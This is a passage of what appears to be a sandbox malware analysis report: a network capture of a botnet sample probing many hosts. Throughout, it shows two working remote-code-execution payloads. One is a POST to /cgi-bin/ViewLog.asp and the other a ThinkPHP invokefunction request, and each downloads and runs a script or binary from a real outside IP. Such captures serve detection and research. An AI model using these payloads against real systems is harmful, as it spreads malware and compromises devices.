                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        357192.168.2.233529894.122.15.1378080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:53.595567942 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        358192.168.2.235289494.121.74.478080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:53.599733114 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        359192.168.2.234563431.200.95.1968080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:53.602716923 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        360192.168.2.233651488.99.174.21680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:54.208745003 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:54.510616064 CEST336INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.22.0
                                                        Date: Sun, 14 Apr 2024 14:35:54 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        361192.168.2.235988088.173.190.8580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:54.500969887 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:54.792855024 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:35:54 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        362192.168.2.233361688.126.142.16880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:54.804574966 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:55.117650986 CEST179INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:35:54 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 475
                                                        Connection: close
                                                        ETag: "622f06cd-1db"
                                                        Apr 14, 2024 16:35:55.121212006 CEST487INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Freebox :: Requte invalide</title><link href="/e


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        363192.168.2.233702888.204.207.16980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:55.000457048 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        364192.168.2.235790094.122.7.878080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:56.309895039 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        365192.168.2.234956294.121.103.1688080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:56.312053919 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        366192.168.2.235272294.121.140.288080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:56.312206030 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        367192.168.2.234964894.122.231.1328080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:56.314306974 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        368192.168.2.233781031.200.93.1658080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:56.318357944 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        369192.168.2.235086431.0.199.1688080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:56.328017950 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:56.705945015 CEST482INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html
                                                        Content-Length: 345
                                                        Date: Sun, 14 Apr 2024 14:30:36 GMT
                                                        Server: Apache
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        370192.168.2.235990888.173.190.8580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:56.428797960 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:56.724562883 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:35:56 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        371192.168.2.234538885.85.0.118080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:56.628386021 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        372192.168.2.235114894.123.8.658080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:56.671119928 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        373192.168.2.235960231.40.225.2118080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:56.671195984 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:57.026364088 CEST1289INHTTP/1.0 400 Bad Request
                                                        Server: squid/3.1.23
                                                        Mime-Version: 1.0
                                                        Date: Sun, 14 Apr 2024 14:05:08 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 3167
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b 0a 7d
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff;}


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        374192.168.2.234064495.101.174.2480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:56.728636026 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:57.026196003 CEST581INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 359
                                                        Expires: Sun, 14 Apr 2024 14:35:56 GMT
                                                        Date: Sun, 14 Apr 2024 14:35:56 GMT
                                                        Connection: close
